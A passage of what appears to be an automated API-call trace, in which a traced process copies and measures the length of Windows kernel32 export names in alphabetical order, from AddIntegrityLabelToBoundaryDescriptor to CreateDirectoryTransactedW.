returned="AddIntegrityLabelToBoundaryDescriptor" [0079.318] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.318] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.318] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.318] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.318] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.318] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.318] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.318] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.318] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.318] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.319] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.319] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.319] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.319] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.319] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.319] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.319] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.319] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.319] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.319] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.319] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.319] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.319] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.319] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.319] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.319] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.319] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.319] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.319] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.319] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.319] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.319] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.319] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.319] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.319] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.319] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.319] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.319] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.319] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.319] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.319] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.319] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.319] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.319] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.319] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.319] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.320] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.320] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.320] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.320] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.320] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.320] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.320] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.320] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.320] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.320] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.320] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.320] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.320] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.320] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.320] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.320] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.320] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.320] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.320] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.320] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.320] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.320] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.320] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.320] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.320] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.320] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.320] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.320] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.320] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.320] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.320] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.320] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.321] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.321] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.321] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.321] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.321] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.321] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.321] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.321] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.321] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.321] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.321] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.321] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.321] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.321] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.321] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.321] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.321] lstrlenA (lpString="BEEP") returned 4 [0079.321] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.321] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.321] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.321] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.321] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.321] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.321] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.321] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.321] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.321] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.321] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.321] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.321] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.321] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.321] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.321] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.321] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.321] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.321] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.322] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.322] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.322] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.322] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.322] lstrlenA (lpString="CANCELIO") returned 8 [0079.322] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.322] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.322] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.322] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.322] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.322] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.322] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.322] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.322] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.322] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.322] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.322] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.322] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.322] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.322] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.322] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.322] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.322] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.322] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.322] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.322] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.322] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.322] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.322] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.322] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.323] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.323] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.323] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.323] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.323] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.323] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.323] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.323] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.323] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.323] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.323] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.323] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.323] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.323] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.323] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.323] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.323] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.323] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.323] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.323] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.323] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.323] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.323] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.323] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.323] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.323] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.323] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.323] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.323] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.323] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.323] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.323] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.323] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.323] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.323] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.324] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.324] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.324] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.324] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.324] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.324] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.324] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.324] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.324] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.324] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.324] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.324] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.324] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.324] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.324] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.324] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.324] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.324] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.324] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.324] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.324] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.324] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.324] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.324] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.324] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.324] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.324] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.324] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.324] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.324] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.324] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.324] lstrlenA (lpString="COPYFILEA") returned 9 [0079.324] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.324] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.325] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.325] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.325] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.325] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.325] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.325] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.325] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.325] lstrlenA (lpString="COPYFILEW") returned 9 [0079.325] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.325] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.325] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.325] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.325] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.325] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.325] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.325] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.325] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.325] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.325] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.325] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.325] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.325] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.325] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.325] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.325] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.325] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.325] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.325] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.325] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.325] lstrlenA 